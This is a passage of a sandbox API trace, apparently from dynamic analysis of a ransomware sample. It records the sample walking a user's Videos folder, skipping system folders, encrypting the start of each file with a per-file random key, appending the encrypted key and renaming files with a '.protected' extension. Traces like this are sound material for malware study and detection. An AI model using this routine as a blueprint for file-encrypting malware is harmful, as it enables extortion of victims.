(lpString1=".", lpString2="Program Files") returned -1 [0092.616] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.616] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.616] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.616] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\.") returned 42 [0092.616] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.616] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0092.616] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0092.616] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.616] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.616] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.616] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.616] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.616] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.616] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.616] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.616] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\..") returned 43 [0092.616] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.616] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.616] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0092.616] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0092.616] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.616] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.617] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.617] lstrcmpiW (lpString1="6LPEdpSi.flv", lpString2="Windows") returned -1 [0092.617] lstrcmpiW (lpString1="6LPEdpSi.flv", lpString2="Program Files") returned -1 [0092.617] lstrcmpiW (lpString1="6LPEdpSi.flv", lpString2="Program Files (x86)") returned -1 [0092.617] lstrcmpiW (lpString1="6LPEdpSi.flv", lpString2="$Recycle.bin") returned 1 [0092.617] lstrcmpiW (lpString1="6LPEdpSi.flv", lpString2="System Volume Information") returned -1 [0092.617] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6LPEdpSi.flv") returned 53 [0092.617] StrStrIW (lpFirst="6LPEdpSi.flv", lpSrch=".protected") returned 0x0 [0092.617] lstrcmpW (lpString1="6LPEdpSi.flv", lpString2="RESTORE_FILES.txt") returned -1 [0092.617] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.617] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6LPEdpSi.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6lpedpsi.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.617] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6LPEdpSi.flv") returned 53 [0092.617] StrStrW (lpFirst="6LPEdpSi.flv", lpSrch=".txt") returned 0x0 [0092.618] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6LPEdpSi.flv") returned 53 [0092.618] StrStrW (lpFirst="6LPEdpSi.flv", lpSrch=".rar") returned 0x0 [0092.618] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6LPEdpSi.flv") returned 53 [0092.618] StrStrW (lpFirst="6LPEdpSi.flv", lpSrch=".zip") returned 0x0 [0092.618] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.618] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.618] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.619] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.619] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.619] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.619] CloseHandle (hObject=0xb4) returned 1 [0092.619] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6LPEdpSi.flv.protected") returned 63 [0092.619] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6LPEdpSi.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6lpedpsi.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6LPEdpSi.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6lpedpsi.flv.protected")) returned 1 [0092.620] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.620] lstrcmpiW (lpString1="6pYE9WW", lpString2="Windows") returned -1 [0092.620] lstrcmpiW (lpString1="6pYE9WW", lpString2="Program Files") returned -1 [0092.620] lstrcmpiW (lpString1="6pYE9WW", lpString2="Program Files (x86)") returned -1 [0092.620] lstrcmpiW (lpString1="6pYE9WW", lpString2="$Recycle.bin") returned 1 [0092.620] lstrcmpiW (lpString1="6pYE9WW", lpString2="System Volume Information") returned -1 [0092.620] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW") returned 48 [0092.620] lstrcmpW (lpString1="6pYE9WW", lpString2=".") returned 1 [0092.620] lstrcmpW (lpString1="6pYE9WW", lpString2="..") returned 1 [0092.620] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\*") returned 50 [0092.620] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0092.620] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.620] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.620] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.620] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.620] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.620] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\.") returned 50 [0092.620] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.620] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.620] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.620] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.620] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.620] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.620] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.620] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\..") returned 51 [0092.620] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.620] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.620] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.620] lstrcmpiW (lpString1="5Hg5_ZPB.avi", lpString2="Windows") returned -1 [0092.620] lstrcmpiW (lpString1="5Hg5_ZPB.avi", lpString2="Program Files") returned -1 [0092.620] lstrcmpiW (lpString1="5Hg5_ZPB.avi", lpString2="Program Files (x86)") returned -1 [0092.620] lstrcmpiW (lpString1="5Hg5_ZPB.avi", lpString2="$Recycle.bin") returned 1 [0092.620] lstrcmpiW (lpString1="5Hg5_ZPB.avi", lpString2="System Volume Information") returned -1 [0092.620] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\5Hg5_ZPB.avi") returned 61 [0092.620] StrStrIW (lpFirst="5Hg5_ZPB.avi", lpSrch=".protected") returned 0x0 [0092.621] lstrcmpW (lpString1="5Hg5_ZPB.avi", lpString2="RESTORE_FILES.txt") returned -1 [0092.621] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.621] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\5Hg5_ZPB.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\5hg5_zpb.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.621] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\5Hg5_ZPB.avi") returned 61 [0092.621] StrStrW (lpFirst="5Hg5_ZPB.avi", lpSrch=".txt") returned 0x0 [0092.621] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\5Hg5_ZPB.avi") returned 61 [0092.621] StrStrW (lpFirst="5Hg5_ZPB.avi", lpSrch=".rar") returned 0x0 [0092.621] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\5Hg5_ZPB.avi") returned 61 [0092.621] StrStrW (lpFirst="5Hg5_ZPB.avi", lpSrch=".zip") returned 0x0 [0092.621] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.622] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.622] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.622] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.622] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.622] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.622] CloseHandle (hObject=0xd4) returned 1 [0092.623] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\5Hg5_ZPB.avi.protected") returned 71 [0092.623] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\5Hg5_ZPB.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\5hg5_zpb.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\5Hg5_ZPB.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\5hg5_zpb.avi.protected")) returned 1 [0092.840] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.840] lstrcmpiW (lpString1="KyM4mWn F0k Z", lpString2="Windows") returned -1 [0092.840] lstrcmpiW (lpString1="KyM4mWn F0k Z", lpString2="Program Files") returned -1 [0092.840] lstrcmpiW (lpString1="KyM4mWn F0k Z", lpString2="Program Files (x86)") returned -1 [0092.840] lstrcmpiW (lpString1="KyM4mWn F0k Z", lpString2="$Recycle.bin") returned 1 [0092.840] lstrcmpiW (lpString1="KyM4mWn F0k Z", lpString2="System Volume Information") returned -1 [0092.840] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z") returned 62 [0092.840] lstrcmpW (lpString1="KyM4mWn F0k Z", lpString2=".") returned 1 [0092.840] lstrcmpW (lpString1="KyM4mWn F0k Z", lpString2="..") returned 1 [0092.840] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\*") returned 64 [0092.840] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0092.840] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.840] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.840] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.840] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.840] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.840] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\.") returned 64 [0092.841] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.841] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.841] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.841] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.841] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.841] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.841] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.841] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\..") returned 65 [0092.841] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.841] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.841] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.841] lstrcmpiW (lpString1="6vmo3S2K.flv", lpString2="Windows") returned -1 [0092.841] lstrcmpiW (lpString1="6vmo3S2K.flv", lpString2="Program Files") returned -1 [0092.841] lstrcmpiW (lpString1="6vmo3S2K.flv", lpString2="Program Files (x86)") returned -1 [0092.841] lstrcmpiW (lpString1="6vmo3S2K.flv", lpString2="$Recycle.bin") returned 1 [0092.841] lstrcmpiW (lpString1="6vmo3S2K.flv", lpString2="System Volume Information") returned -1 [0092.841] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\6vmo3S2K.flv") returned 75 [0092.841] StrStrIW (lpFirst="6vmo3S2K.flv", lpSrch=".protected") returned 0x0 [0092.841] lstrcmpW (lpString1="6vmo3S2K.flv", lpString2="RESTORE_FILES.txt") returned -1 [0092.841] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.841] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.841] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\6vmo3S2K.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\6vmo3s2k.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.842] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\6vmo3S2K.flv") returned 75 [0092.842] StrStrW (lpFirst="6vmo3S2K.flv", lpSrch=".txt") returned 0x0 [0092.842] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\6vmo3S2K.flv") returned 75 [0092.842] StrStrW (lpFirst="6vmo3S2K.flv", lpSrch=".rar") returned 0x0 [0092.842] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\6vmo3S2K.flv") returned 75 [0092.842] StrStrW (lpFirst="6vmo3S2K.flv", lpSrch=".zip") returned 0x0 [0092.842] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.843] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.843] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.843] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.843] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.843] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.843] CloseHandle (hObject=0xd8) returned 1 [0092.843] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\6vmo3S2K.flv.protected") returned 85 [0092.843] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\6vmo3S2K.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\6vmo3s2k.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\6vmo3S2K.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\6vmo3s2k.flv.protected")) returned 1 [0092.845] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.845] lstrcmpiW (lpString1="LL1b9BnwX3kr O82pKyV.mp4", lpString2="Windows") returned -1 [0092.845] lstrcmpiW (lpString1="LL1b9BnwX3kr O82pKyV.mp4", lpString2="Program Files") returned -1 [0092.845] lstrcmpiW (lpString1="LL1b9BnwX3kr O82pKyV.mp4", lpString2="Program Files (x86)") returned -1 [0092.845] lstrcmpiW (lpString1="LL1b9BnwX3kr O82pKyV.mp4", lpString2="$Recycle.bin") returned 1 [0092.845] lstrcmpiW (lpString1="LL1b9BnwX3kr O82pKyV.mp4", lpString2="System Volume Information") returned -1 [0092.845] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\LL1b9BnwX3kr O82pKyV.mp4") returned 87 [0092.845] StrStrIW (lpFirst="LL1b9BnwX3kr O82pKyV.mp4", lpSrch=".protected") returned 0x0 [0092.845] lstrcmpW (lpString1="LL1b9BnwX3kr O82pKyV.mp4", lpString2="RESTORE_FILES.txt") returned -1 [0092.845] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.845] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\LL1b9BnwX3kr O82pKyV.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ll1b9bnwx3kr o82pkyv.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.846] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\LL1b9BnwX3kr O82pKyV.mp4") returned 87 [0092.846] StrStrW (lpFirst="LL1b9BnwX3kr O82pKyV.mp4", lpSrch=".txt") returned 0x0 [0092.846] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\LL1b9BnwX3kr O82pKyV.mp4") returned 87 [0092.846] StrStrW (lpFirst="LL1b9BnwX3kr O82pKyV.mp4", lpSrch=".rar") returned 0x0 [0092.846] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\LL1b9BnwX3kr O82pKyV.mp4") returned 87 [0092.846] StrStrW (lpFirst="LL1b9BnwX3kr O82pKyV.mp4", lpSrch=".zip") returned 0x0 [0092.846] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.847] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.847] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.847] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.847] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.847] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.847] CloseHandle (hObject=0xd8) returned 1 